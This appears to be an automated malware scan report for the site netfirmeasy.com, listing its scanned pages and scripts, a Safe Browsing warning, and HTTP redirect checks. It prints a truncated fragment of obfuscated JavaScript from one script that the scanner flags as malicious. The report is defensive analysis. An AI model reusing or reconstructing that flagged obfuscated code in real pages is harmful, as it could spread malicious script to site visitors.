Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=netfirmeasy.com
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
| Request | Server response | Status |
http://netfirmeasy.com/ | 200 OK Content-Length: 18995 Content-Type: text/html | clean |
http://netfirmeasy.com/js/netfirmeasy_main.js | 200 OK Content-Length: 10051 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) var _0x8f5f=["\x73\x74\x61\x74\x75\x73","","\x6F\x6E\x63\x6F\x6E\x74\x65\x78\x74\x6D\x65\x6E\x75","\x4D\x73\x78\x6D\x6C\x32\x2E\x58\x4D\x4C\x48\x54\x54\x50","\x4D\x69\x63\x72\x6F\x73\x6F\x66\x74\x2E\x58\x4D\x4C\x48\x54\x54\x50","\x58\x4D\x4C\x48\x74\x74\x70\x52\x65\x71\x75\x65\x73\x74\x20\x6E\x6F\x74\x20\x73\x75\x70\x70\x6F\x72\x74\x65\x64","\x68\x72\x65\x66","\x6C\x6F\x63\x61\x74\x69\x6F\x6E","\x69\x6E\x64\x65\x78\x2E\x70\x68\x70\x3F\x73\x74\x69\x64\x3D\x61\x63\x63\x69\x6E\x66\x6F\x26\x6B\x65\x Antivirus reports:
| ||
http://netfirmeasy.com/js/jrs.js | 200 OK Content-Length: 31033 Content-Type: application/x-javascript | clean |
http://netfirmeasy.com/js/jrs.tools.min.js | 200 OK Content-Length: 118695 Content-Type: application/x-javascript | clean |
http://netfirmeasy.com/js/messager.pack.js | 200 OK Content-Length: 31018 Content-Type: application/x-javascript | clean |
http://netfirmeasy.com/js/messager.js | 200 OK Content-Length: 4475 Content-Type: application/x-javascript | clean |
http://netfirmeasy.com/js/netfirmeasy_general.js | 200 OK Content-Length: 7210 Content-Type: application/x-javascript | clean |
http://v2.jiathis.com/code/jia.js | 200 OK Content-Length: 24042 Content-Type: application/x-javascript | clean |
http://netfirmeasy.com/index.php?stid=login | 200 OK Content-Length: 8715 Content-Type: text/html | clean |
http://netfirmeasy.com/index.php?stid=support | 200 OK Content-Length: 8400 Content-Type: text/html | clean |
http://netfirmeasy.com/index.php?stid=chk | 200 OK Content-Length: 7251 Content-Type: text/html | clean |
http://netfirmeasy.com/index.php?stid=home | 200 OK Content-Length: 18995 Content-Type: text/html | clean |
http://netfirmeasy.com/index.php?stid=domain | 200 OK Content-Length: 10228 Content-Type: text/html | clean |
http://netfirmeasy.com/index.php?stid=host | 200 OK Content-Length: 27671 Content-Type: text/html | clean |
http://netfirmeasy.com/index.php?stid=gallary | 200 OK Content-Length: 8339 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: netfirmeasy.com
Result:
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Connection: close
Date: Mon, 12 Jan 2015 15:36:45 GMT
Pragma: no-cache
Accept-Ranges: bytes
Age: 0
Server: Apache/2
Content-Length: 18995
Content-Type: text/html
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Set-Cookie: PHPSESSID=17352adcc3ae0968f75facaf0bf369ff; path=/
X-Powered-By: PHP/5.2.17
...18995 bytes of data.
GET / HTTP/1.1
Host: netfirmeasy.com
Result:
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Connection: close
Date: Mon, 12 Jan 2015 15:36:45 GMT
Pragma: no-cache
Accept-Ranges: bytes
Age: 0
Server: Apache/2
Content-Length: 18995
Content-Type: text/html
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Set-Cookie: PHPSESSID=17352adcc3ae0968f75facaf0bf369ff; path=/
X-Powered-By: PHP/5.2.17
...18995 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: netfirmeasy.com
Referer: http://www.google.com/search?q=netfirmeasy.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: netfirmeasy.com
Referer: http://www.google.com/search?q=netfirmeasy.com
Result:
The result is similar to the first query. There are no suspicious redirects found.